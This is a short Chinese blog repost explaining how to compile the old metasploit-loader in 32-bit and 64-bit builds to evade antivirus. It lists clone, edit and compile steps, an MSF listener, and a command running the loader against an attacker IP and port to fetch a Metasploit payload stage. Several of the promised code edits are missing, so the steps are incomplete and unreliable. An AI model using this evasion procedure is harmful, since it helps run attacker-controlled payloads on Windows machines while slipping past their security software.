文章转自:
https://medium.com/securebit/bypassing-av-through-metasploit-loader-32-bit-6d62930151ad
https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8
PS:这个metasploit-loader是8年前的东西了,我测试了下32位的,被杀很多,不像原作者说的全免杀,不知道是不是伪造的,64位的能过一些,随机应变吧
32位
git clone https://github.com/rsmudge/metasploit-loader.git
编辑metasploit-loader/master/src/main.c在main函数中,注释93-98行,修改99行如下
使用MinGW编译
i686-w64-mingw32-gccmain.c -o loadmeta.exe -lws2_32
执行
64位
使用Dev C ++工具编译
https://sourceforge.net/projects/orwelldevcpp/
确保安装完整,同时拥有32和64位
新建一个Project Loader64并将文件另存为Loader64。
将Project设置为C Project,将应用程序设置为Console Application。从命令行执行
将
https://github.com/rsmudge/metasploit-loader/blob/master/src/main.c
粘贴进去
修改以下内容
把#include <winsocks2.h>放在windows.h上面
编译选项中添加-lws2_32
F9编译
MSF监听
Windows上执行
Loader64.exe192.168.137.128 9500
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论